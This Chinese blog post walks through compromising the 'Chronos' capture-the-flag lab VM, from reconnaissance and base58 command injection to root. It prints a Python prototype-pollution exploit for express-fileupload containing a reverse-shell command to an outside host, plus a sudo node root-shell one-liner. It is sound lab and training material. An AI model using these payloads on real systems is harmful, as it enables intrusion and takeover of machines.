Chronos靶机打靶过程与思路

1.常规主机侦探,sudo netdiscover -r 10.0.2.0/16

2.常规端口和服务侦探

3.cyberchet解码器,针对js代码

4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析

5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以
考虑使用命令执行

6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块
存在参数污染远程命令代码执行漏洞,使用国外网站给的python的exp
import requests

cmd = ‘bash -c “bash -i &> /dev/tcp/p6.is/8888 0>&1”’

pollute

requests.post(‘http://p6.is:7777’, files = {‘proto.outputFunctionName’: (
None, f"x;console.log(1);process.mainModule.require(‘child_process’).exec(‘{cmd}’);x")})

execute command

requests.get(‘http://p6.is:7777’)

7.在kali本机上开启服务,新设置一个端口,用获得的反弹shell进入tmp目录下下载下来,再在目标靶机
上执行exp获得普通权限,得到普通的flag

8.三种提权方式,内核漏洞提权,suid权限配置错误,sudo权限,发现前两个都执行不了,所以sudo -l发现两个
可执行的sudo权限,发现node是一个类似于java的运行环境,
利用node反弹shell,sudo node -e ‘child_process.spawn(“/bin/bash”,{stdio:[0,1,2]})’

9.成功得到root权限,拿到/root目录下的root权限的flag,打靶完成

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值